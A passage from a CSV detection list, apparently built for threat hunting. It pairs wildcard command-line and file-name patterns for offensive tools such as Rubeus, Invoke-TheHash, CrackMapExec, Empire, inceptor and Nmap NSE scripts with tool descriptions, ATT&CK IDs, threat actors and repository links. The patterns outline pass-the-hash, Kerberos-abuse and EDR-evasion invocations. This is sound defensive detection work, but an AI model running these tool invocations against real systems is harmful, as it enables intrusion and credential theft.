Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-multicast-echo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-multicast-invalid-dst.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-multicast-mld.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-multicast-slaac.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-wordlist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-sniffer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-traceroute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --target-user * --dc-ip * -command *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -* tdotnet publish Athena *,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -* teamspeak2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* teamstracker.py*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,0,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -* telnet-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* telnet-encryption.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* telnet-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tftp-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tgssub * /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* tgtdeleg /nowrap*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* tgtdeleg /spn:cifs*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -* tgtdeleg /target:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* thc-hidra*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -* theHarvester.py *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* thief.py*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH 
credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -* --threads * scan --buckets-file* ,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -* ticketsplease.*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -* TikiLoader*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -* tls-alpn.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tls-nextprotoneg.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tls-ticketbleed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tn3270-screen.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* TokenStrip.c *,offensive_tool_keyword,cobaltstrike,Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nick-frischkorn/TokenStripBOF,1,0,N/A,10,10,28,5,2022-06-15T21:29:24Z,2022-06-15T02:13:13Z -* TokenStripBOF.o 
*,offensive_tool_keyword,cobaltstrike,Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nick-frischkorn/TokenStripBOF,1,0,N/A,10,10,28,5,2022-06-15T21:29:24Z,2022-06-15T02:13:13Z -* tokenvator *,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -* -Tokenvator -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* --tor *,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation 
tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* tor-consensus-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --tor-port*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --tor-type*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* traceroute-geolocation.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --transformer donut*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* --transformer Loader*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* --transformer pe2sh*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* --transformer sRDI*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* TSCHRPCAttack*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -* tso-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tso-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tweetshell.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,0,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -* --type asreproast*,offensive_tool_keyword,ldapsearch-ad,Python3 script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,0,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -* --type search-spn*,offensive_tool_keyword,ldapsearch-ad,Python3 script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,0,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -* -Type SMBClient -Target * -TargetExclude * -Username * -Hash *,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,0,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -* -Type SMBEnum -Target * -TargetExclude * -Username * -Hash *,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,0,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -* -Type SMBExec -Target * -TargetExclude * -Username * -Hash *,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,0,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -* -type user -search * -DomainController * -Credential * -list yes*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-SPN.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -Type WMIExec -Target * -TargetExclude * -Username * -Hash *,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,0,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -"* -u * -d * --dc-ip * -k --no-pass --target * --action ""list""*",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -* -u * --local-auth*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -u * -p * --lusers*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
